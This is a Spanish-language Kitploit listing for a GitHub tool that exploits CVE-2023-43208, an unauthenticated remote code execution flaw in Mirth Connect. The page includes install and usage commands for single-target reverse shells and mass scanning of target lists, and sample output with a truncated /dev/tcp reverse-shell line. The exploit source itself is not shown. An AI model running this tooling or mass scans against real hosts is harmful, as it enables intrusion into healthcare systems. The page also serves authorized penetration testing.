Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-43208 — Exploit de RCE no autenticado para CVE-2023-43208 en Mirth Connect mediante deserialización XML, con detección de versiones, escaneo masivo y shell PTY interactiva. | Kitploit
Herramientas/GitHubGitHub/4nuxd/cve-2023-43208
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

Exploit de RCE no autenticado para CVE-2023-43208 en Mirth Connect mediante deserialización XML, con detección de versiones, escaneo masivo y shell PTY interactiva.

Ver Repositorio
12hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-43208 — Mirth Connect RCE

Python CVE Platform

Exploit de Prueba de Concepto para CVE-2023-43208, una vulnerabilidad de Ejecución Remota de Código no autenticada en Mirth Connect versiones anteriores a 4.4.1.


Descripción

Mirth Connect es un motor de integración sanitaria de código abierto ampliamente implementado. Esta vulnerabilidad aprovecha una falla de deserialización de Java a través del endpoint /api/users usando un payload XML manipulado que encadena gadgets de Apache Commons Collections para lograr RCE no autenticada.

La versión mejorada reemplaza el listener pwncat original con un shell PTY interactivo completamente libre de dependencias usando solo builtins de Python (socket, , , ). El shell se actualiza automáticamente a un PTY completo al conectarse.

select
tty
termios

Versiones Afectadas

SoftwareVersiones VulnerablesVersión Corregida
Mirth Connect< 4.4.14.4.1+

Características

  • Detección automática de instancias de Mirth Connect
  • Huella digital de versión y verificación de vulnerabilidad
  • RCE no autenticada mediante payload de deserialización XML
  • Actualización automática a shell PTY (fallback a python3/python/script)
  • Propagación correcta del tamaño del terminal (stty rows/cols)
  • Escáner masivo con soporte de múltiples hilos
  • Salida de objetivos vulnerables a archivo
  • Sin dependencia de pwncat — solo stdlib para el listener

Instalación

root@kitploit:~
git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

Requisitos

root@kitploit:~
requests
packaging
rich
alive-progress

Uso

Objetivo Único — Obtener un Shell

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

Objetivo Único — Con ngrok / Puerto de Enlace

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

Escaneo Masivo desde Archivo

root@kitploit:~
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

Argumentos

FlagDescripción
-u, --urlURL del objetivo
-lh, --lhostTu IP de escucha
-lp, --lportTu puerto de escucha
-bp, --bindportPuerto de enlace alternativo (útil con ngrok)
-f, --fileArchivo que contiene lista de URLs objetivo
-o, --outputGuardar objetivos vulnerables en archivo
-t, --threadsNúmero de hilos para escaneo (por defecto: 50)

Ejemplo de Salida

root@kitploit:~
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

Aviso Legal

Esta herramienta está destinada únicamente para pruebas de penetración autorizadas y fines educativos.
El uso no autorizado contra sistemas que no poseas o para los que no tengas permiso explícito es ilegal.
Los autores no se responsabilizan por cualquier mal uso o daño causado por esta herramienta.


Créditos

  • Codificado por: K3ysTr0K3R y Chocapikk
  • Mejorado por: 4nuxd
Descargar herramienta